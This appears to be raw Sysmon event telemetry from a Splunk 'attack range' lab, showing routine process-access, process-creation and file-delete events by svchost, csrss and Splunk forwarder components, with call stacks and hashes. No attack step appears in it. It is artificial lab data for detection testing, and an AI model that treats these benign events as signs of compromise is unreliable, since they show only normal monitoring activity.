10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1149-6216-5104-000000003902}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1149-6216-5104-000000003902}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.597{4F8D34B0-1149-6216-5104-000000003902}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000216438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1149-6216-5004-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1149-6216-5004-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.096{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1149-6216-5004-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.098{4F8D34B0-1149-6216-5004-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:46.445{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E766881EAA264FC1E5714A7D2D6EEF2B,SHA256=A4C444E5F27A5606BA9B751B6E894369C3FC8B9EFDFF9119E1EE32E6084D1FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:46.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7358BCA387896D9895C05C403E841632,SHA256=ECB47094A95EE82FE0C910B1A1435C8A7272DC75B3260FA2C2465929141B6436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:46.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFAC64FD97AA160C06B2B900C0F9B71,SHA256=ACB01F7665F29980FC128EC55D789FAC1836F010DECDDD1FB31BF320D4DE9B6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:46.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05FF465B1125225281F1C1F6F33D586F,SHA256=AFBA8C0BC98AC98492F26D2157E1E42DBDF3ABA0D4EB66E17F3E856D85C62924,IMPHASH=00000000000000000000000000000000falsetrue 